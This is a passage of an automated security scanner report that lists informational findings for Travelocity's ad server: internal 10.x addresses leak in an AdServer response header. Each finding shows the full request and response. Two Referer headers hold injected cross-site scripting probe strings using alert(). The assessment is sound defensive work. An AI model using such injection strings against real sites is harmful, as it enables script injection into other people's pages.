Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:48 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1399
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...
23.18. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&random=869493130  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do?Service=TRAVELOCITY&SearchPath=hots&old_cb=N&mode=1&x=53&y=14pax_cnt=2&city=&state=&dateLeavingMonth=10&dateLeavingDay=9&dateReturningMonth=10&dateReturningDay=16&adults=1&children=0&WA1=03010&WA2=away.com&WA3=cpc&WA4=45&WA5=trave_hotelbookingtab_awy_|u&WA6=hot&WA8=|,,
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:59 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:37:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1277
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...
23.19. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1056
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125326&AdID=181467&TargetID=31993&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,9520,10495,11148,12670,20052,20299,20311,21304,22041,22251,2
...[SNIP]...
23.20. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317605014|PC#1317600481056-80236.19#1318812754|check#true#1317603214

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:52 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:52:52 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 355
Content-Type: application/x-javascript

document.write('<!-- PubMatic ad tag (Javascript) : igougo_300X250_ATF | http://www.igougo.com | 300 x 250 Medium Rectangle -->\n');
var pubId=26620;
var siteId=26621;
var kadId=21556;
var kadwidth=30
...[SNIP]...
23.21. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317605014|PC#1317600481056-80236.19#1318812754|check#true#1317603214

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:52 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:52:52 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 347
Content-Type: application/x-javascript

document.write('<!-- PubMatic ad tag (Javascript) : igougo_728X90_ATF | http://www.igougo.com | 728 x 90 Leaderboard -->\n');
var pubId=26620;
var siteId=26621;
var kadId=21557;
var kadwidth=728;
var
...[SNIP]...
23.22. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317605014|PC#1317600481056-80236.19#1318812754|check#true#1317603214

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:52 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:52:52 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 19
Content-Type: application/x-javascript

document.write('');
23.23. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1295234161634531840155155327&adsize=728x90&pagepos=1&random=634531840155155327  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=ratefinderhotel&tile=1295234161634531840155155327&adsize=728x90&pagepos=1&random=634531840155155327

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=ratefinderhotel&tile=1295234161634531840155155327&adsize=728x90&pagepos=1&random=634531840155155327? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:26:59 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:26:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 729
Content-Type: application/x-javascript

document.write('<a target=\"_new\" href=\"http://dm.travelocity.com:80/event.ng/Type=click&FlightID=101283&AdID=151343&TargetID=17576&Segments=1,4301,4302,4304,4865,4921,5016,9095,11559,16220,20349,21
...[SNIP]...
23.24. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1967228532634531863146718750&adsize=728x90&pagepos=1&random=634531863146718750  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=ratefinderhotel&tile=1967228532634531863146718750&adsize=728x90&pagepos=1&random=634531863146718750

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=ratefinderhotel&tile=1967228532634531863146718750&adsize=728x90&pagepos=1&random=634531863146718750? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; mbox=session#1317600481056-80236#1317604116|PC#1317600481056-80236.19#1318811856|check#true#1317602316; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:50:30 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:50:30 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 729
Content-Type: application/x-javascript

document.write('<a target=\"_new\" href=\"http://dm.travelocity.com:80/event.ng/Type=click&FlightID=101283&AdID=151343&TargetID=17576&Segments=1,4301,4302,4304,4865,4921,5016,9095,11559,16220,20349,21
...[SNIP]...
23.25. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=334526774634531842119167547&adsize=728x90&pagepos=1&random=634531842119167547  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=igougo&area=ratefinderhotel&tile=334526774634531842119167547&adsize=728x90&pagepos=1&random=634531842119167547

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=igougo&area=ratefinderhotel&tile=334526774634531842119167547&adsize=728x90&pagepos=1&random=634531842119167547? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunderda8d5'%3balert(1)//6e4526513fd&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; NGUserID=a1c4b0d-32323-499133968-1317600484; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; mbox=session#1317600481056-80236#1317604116|PC#1317600481056-80236.19#1318811856|check#true#1317602316; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:47:26 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:47:26 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 729
Content-Type: application/x-javascript

document.write('<a target=\"_new\" href=\"http://dm.travelocity.com:80/event.ng/Type=click&FlightID=101283&AdID=151343&TargetID=17576&Segments=1,4301,4302,4304,4865,4921,5016,9095,11559,16220,20349,21
...[SNIP]...
23.26. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600 HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:04 GMT
Server: Apache
X-Server: prdlmn0408
Set-Cookie: NGUserID=a1c4b0d-32323-499133968-1317600484; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:04 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1150
Content-Type: application/x-javascript

document.write('<a href=\"http://dm.travelocity.com/event.ng/Type=click&FlightID=131412&AdID=180775&TargetID=28645&ASeg=&AMod=&AOpt=0&Segments=1,9,24,3090,4384,5796,5848,9520,10495,11148,12670,20052,2
...[SNIP]...
23.27. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600 HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:06 GMT
Server: Apache
X-Server: prdlmn4008
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:06 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1204
Content-Type: application/x-javascript

document.write('<a href=\"http://dm.travelocity.com/event.ng/Type=click&FlightID=131412&AdID=180775&TargetID=28645&ASeg=&AMod=&AOpt=0&Segments=1,9,24,3090,4384,5796,5848,9520,10495,11148,12670,20052,2
...[SNIP]...
23.28. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=370629  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=370629

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=370629? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.2.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:53 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:53 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 119
Content-Type: application/x-javascript

document.write('<img src=\"http://ag.travelocity.com.edgesuite.net/Sponsor_gifs/tvly_default_1x1.gif\" border=\"0\">');
23.29. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=854351  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=854351

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=854351? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
X-Server: prdlmn3110
